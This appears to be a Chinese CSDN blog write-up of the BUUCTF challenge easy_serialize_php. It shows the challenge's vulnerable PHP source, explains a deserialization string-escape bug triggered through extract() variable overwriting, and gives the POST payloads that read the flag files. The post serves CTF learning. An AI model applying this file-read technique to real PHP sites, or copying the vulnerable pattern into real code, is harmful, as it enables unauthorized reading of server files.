buuctf-[安洵杯 2019]easy_serialize_php (小宇特详解)

最新推荐文章于 2024-02-14 17:44:51 发布
最新推荐文章于 2024-02-14 17:44:51 发布
阅读量1.5k 收藏 4
点赞数
分类专栏: buuctf 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/123123497
版权

buuctf-[安洵杯 2019]easy_serialize_php (小宇特详解)

1.先看题目,出现了一段代码,进行代码审计

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}//将变量$img中的php flag php5 php4 fl1g的字符串替换成''空字符


if($_SESSION){//摧毁$_SESSION数组变量
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;//变量覆盖可以重置$_SESSION变量

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}//如果!$function为空的话输出刚开始的页面,也就是帮助页面

if(!$_GET['img_path']){//$_GET['img_path'] 为空情况下会默认给定一个图片文件名 然后进行base64编码 赋值给SESSION
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}//这里对接收到的img文件名进行base64编码和sha1加密

$serialize_info = filter(serialize($_SESSION));
//序列化$_SESSION然后进行了过滤
if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
} //highlight_file 显示源代码
  # phpinfo 可以查看php信息
  # show_imgage 对$serialize_info 进行序列化

这里找到了提示

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

这里用到的知识点是php反序列化逃逸

上面提示如果传入phpinfo的话就会eval执行phpinfo

这里构造payload

http://9f3dac68-01ea-4e10-928b-3ac1a1b116ca.node4.buuoj.cn:81/index.php?f=phpinfo

发现了提示文件d0g3_f1ag.php

根据上面的源代码分析url里应该是

/index.php?f=show_image

这样才会进行序列化

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
$_SESSION['img']=base64_encode('guest_img.png');

这里将下面的东西进行序列化

$_SESSION["user"] = 'guest';
$_SESSION['function'] = 'a';
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';//d0g3_f1ag.php base64编码
var_dump(serialize($_SESSION));
//得到
string(90) "a:3:{s:4:"user";s:5:"guest";s:8:"function";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"

将这里的user和function进行修改,然后这里会进行代码一开始的过滤,将变量$img中的php flag php5 php4 fl1g的字符串替换成’'空字符

$_SESSION["user"] = 'flagflagflagflagflagflag';
$_SESSION['function'] = 'a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA=='; // d0g3_f1ag.php base64编码

序列化后

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

将flag进行了过滤

a:3:{s:4:"user";s:24:"#";s:8:"function";s:59:"a#";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

由于s:24 会往后边读取24位字符";s:8:"function";s:59:"a做为user的属性值, #号包含起来的部分,读取到a的时候结束,后面的;进行了闭合,相当于吞掉了一个属性和值,接着会继续读取我们构造的img,由于总共三个属性,我在后边加上了一个属性和值,后边的序列化结果直接就被丢弃

payload:

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

得到了flag in /d0g3_fllllllag

/d0g3_fllllllagbase64编码 L2QwZzNfZmxsbGxsbGFn

payload:

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:2:"dd";s:1:"a";}

小宇特详解
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ajax-axios-url-form-serialize 插件
08-19
ajax-axios-url-form-serialize 插件
[安洵 2019]easy_serialize_php(有思考过程)
v2ish1yan的博客
04-20 3004
[安洵 2019]easy_serialize_php 反序列化
BUUCTF 安洵 easy_serialize_php题目解析
2201_75327657的博客
03-29 172
反序列化后又为 {s:4:"flag";s:3:"img";得到fag=flag in /d0g3_fllllllag再利用base64转化得到flag。d0g3——flag.php的base64为ZDBnM19mMWFnLnBocA==查看后寻找flag位置得到它在d0g3里面通过看源码得知需要利用base64转化。这题是利用phpinfo查看回显。通过查看源码就能得知许多信息。
[安洵 2019]easy_serialize_php 详解
最新发布
weixin_62306641的博客
02-14 190
在这道题中是将falg,php.......等字符串替换为空,替换完成后对象名,对象的类型,对象的长度都没变,但是内容没了。那么他就会依据长度吧后面的内容给囊括进去。反序列化中的对象是以{}作为开头结尾的,并且有对象名,对象的类型,对象的长度。但是他给出的例子中并没有$_SESSION[img'],这时候就需要利用到php反序列化逃逸。巧合地是,这时候又变成了一个完整的反序列化内容,又可以被解析,于是我们就可以依据这点来利用。从上述例子可以看出来,当序列化再反序列化后,依旧可以根据键名的到值。
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
buuctf[安洵 2019]easy_serialize_php
2202_75317918的博客
03-30 409
buuctf[安洵 2019]easy_serialize_php
BUUCTF [安洵 2019]easy_serialize_php
m0_62107966的博客
09-24 499
BUUCTF [安洵 2019]easy_serialize_phpphp反序列化时,当一整段内容反序列化结束后,后面的非法字符将会被忽略,而如何判断是否结束呢,可以看到,前面有一个a:3,表示序列化的内容是一个数组,有三个键,而以{作为序列化内容的起点,}作为序列化内容的终点。 所以此时后面的";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}在反序列化时就会被当作非法字符忽略掉,导致我们可以控制$userinfo["img"]的值,达到任意文件读取的效
[安洵 2019]easy_serialize_php
m0_63253040的博客
09-23 492
然后利用变量覆盖得到SESSION[img],中间会给我们制造一个SESSION[img]但是不是我们要的,需要去绕过它。unserialize会把多余的字符串当垃圾处理,在花括号内的就是正确的,花括号后面的就都被扔掉。所以利用filter函数去过滤字符使得前面的既有我们想要的,又成立,可以绕过后面的img。在变量覆盖的后面,所以我们不能直接去读,这里利用反序列化字符串逃逸绕过。这样我们前面的刚好满足反序列化,后面的就可以绕过了。首先我们构造一个序列化的img。值绕过,原理是相似的。
web buuctf [安洵 2019]easy_serialize_php
weixin_44214568的博客
04-02 413
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
使用 MFC 串行化数据和 C++ 对象,三个简单的例子程序
matlab-json-master.zip_The Master_json matlab_matlab java class_
09-23
This package contains Matlab class to serialize/decode matlab object in json format. The software uses org.json java package to convert json to java object and then translates it into Matlab object.
Shapely-1.6.4.post2-cp27-cp27m-macosx_10_9_x86_64.whl
09-29
shapely无法读取和写数据文件,但可以基于应用广泛的一些格式和协议进行序列化(serialize)和去序列化(deserialize)操作。而且shapely不关注数据格式和坐标系统,但shapely的整合性很强,可以和GIS之类的工具协同工作...
easy_serialize_php-[安洵 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF]
qwsn
11-24 1722
0x01、Web 1.easy_serialize_php-[安洵 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF] 第一步:打开题目环境,进入题目链接,代码审计 <?php $function = @$_GET['f']; //GET传参:f function filter($img){ //函数:filter(),使用$img传参 $filter_arr = array('php','flag','php5','ph
BUUCTF之[安洵 2019]easy_serialize_php -------- 反序列化/序列化和代码审计
weixin_44632787的博客
07-28 1453
BUUCTF之[安洵 2019]easy_serialize_php -------- 反序列化/序列化和代码审计 知识点 反序列化中的对象逃逸 extract()变量覆盖 虽然这题说很easy,但是一点都不easy。我花了好长的时间才能看懂。但是里面的知识点却很有意思,希望我能记下来… 废话不多说,放代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','
buuctf easy_serialize_php 解析
qq_73722777的博客
03-29 143
因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,于是我们尝试直接给_SESSION[img]赋值。s:59:"a做为user的属性值,读取到a的时候结束,后面的;进行了闭合,相当于吞掉了一个属性和值,接着会继续读取我们构造的img,由于总共三个属性,我在后边加上了一个属性和值,后边的序列化结果直接就被丢弃。将这里的user和function进行修改,然后这里会进行代码一开始的过滤,将变量$img中的php flag php5 php4 fl1g的字符串替换成’'空字符。
[安洵 2019]easy_serialize_php 1
03-16
这是一道 PHP 序列化题目,需要我们对 PHP 的序列化机制有一定的了解。 题目给出了一个序列化后的字符串,我们需要将其反序列化成 PHP 对象,并修改其中的某个属性值,最后再将其序列化回字符串。 具体的操作步骤可以参考以下代码: ```php <?php class User { public $name; public $age; } // 反序列化 $data = unserialize('O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:18;}'); // 修改属性值 $data->age = 20; // 序列化 $serialized = serialize($data); echo $serialized; ?> ``` 最终输出的序列化字符串为: ``` O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:20;} ``` 其中,`O:4:"User":2:` 表示这是一个类名为 `User` 的对象,有两个属性;`s:4:"name";s:5:"Alice";` 表示 `name` 属性的值为 `Alice`,`s:3:"age";i:20;` 表示 `age` 属性的值为 `20`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值